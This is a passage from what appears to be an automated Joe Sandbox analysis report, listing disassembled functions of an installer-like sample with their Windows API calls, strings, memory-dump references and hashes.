                                                                                                                                                                                                                                                                                              • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                                                                                                                                                                                                                              Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                                                                                                                              • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

                                                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                                                              Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                                                                                                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                                                                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                              • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                              • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                              • Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                                                                                                                              • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                                                                                                                                                                                                              Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                                                                                                                                                                                                              • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                                                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                                                                                                                                                                                                                • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                                                • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                                                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                                                                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                              • String ID: 82D$@%F$@rD$A
                                                                                                                                                                                                                                                                                              • API String ID: 3347642858-1086125096
                                                                                                                                                                                                                                                                                              • Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                                                                                                                              • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                                                                                                                                                                                                              Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                              • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                              • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                              • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                                                                                                                              • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                                                                                                                                                                                                              Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              • \*.*, xrefs: 00406D03
                                                                                                                                                                                                                                                                                              • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                                                                                                                                                                                                              • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                                                                                                                                                                                                              • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                                                                                                                                                                                                              • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                                                                                                                                                                                                              • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                                                                                                                                                                                                              • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                                                                                                                                                                                                              • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                              • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                                                                                                                                                                                                              • API String ID: 2035342205-3294556389
                                                                                                                                                                                                                                                                                              • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                                                                                                                              • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                                                                                                                                                                                                              Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                                                                                                                              • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                              • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                              • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                                                                                                                                              • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                                                                                                                                                                                                              Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                                                                                                                                                              • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                                                                                                                                                                                                                              Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 004063CC
